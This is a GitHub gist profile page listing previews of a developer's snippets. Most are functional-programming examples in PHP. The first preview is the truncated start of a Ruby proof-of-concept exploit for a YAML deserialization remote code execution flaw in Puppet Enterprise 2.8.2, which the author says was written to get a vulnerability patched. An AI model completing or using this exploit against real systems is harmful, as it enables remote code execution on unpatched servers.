Skip to content

Instantly share code, notes, and snippets.

View adaburrows's full-sized avatar

Jillian Ada Burrows adaburrows

114 followers · 89 following
View GitHub Profile
@adaburrows
adaburrows / PE2_8_2RCE.rb
Last active May 22, 2020 22:48
Puppet Enterprise 2.8.2 Remote Code Execution Exploit CVE-2013-3567 -- This uses the same YAML RCE flaw just with different classes known to be installed in this configuration. This is my original PoC I wrote at Puppet to force my coworkers to patch.
require 'puppet'
require 'puppet/network/http_pool'
require 'uri'
url = URI.parse('https://localhost:443/reports/upload')
headers = { "Content-Type" => "application/x-yaml" }
body = <<HELLO
--- !ruby/object:Puppet::Transaction::Report
metrics:
resources: !ruby/object:Puppet::Util::Metric
@adaburrows
adaburrows / compose_functions.php
Created April 26, 2011 06:24
Composing functions in PHP
<?php
/**
* Just trying out more functional programming in PHP
* This gist provides some basic utility functions for:
* + Working with functions
* + Working with arrays
*/
// This function allows creating a new function from two functions passed into it
function compose(&$f, &$g) {
@adaburrows
adaburrows / functional_php_web_app.php
Created April 26, 2011 05:31
Sketch of how to make a functional style controller in PHP
<?php
/**
* This is by no means complete, but it's a sketch of an idea I had to create a
* classless functional style framework for PHP.
*
* It might turn out to be something cool!
*/
// This function allows creating a new function from two functions passed into it
function compose(&$f, &$g) {
@adaburrows
adaburrows / functional_fibonacci.php
Created April 25, 2011 04:02
Functional Programming in PHP
<?php
/**
* Fibonacci:
*============================================================================
* Class for computing fibonacci numbers using functional programming in PHP
* Uses the formula at: http://jburrows.wordpress.com/2009/12/30/fibonacci/
*/
class fibonacci {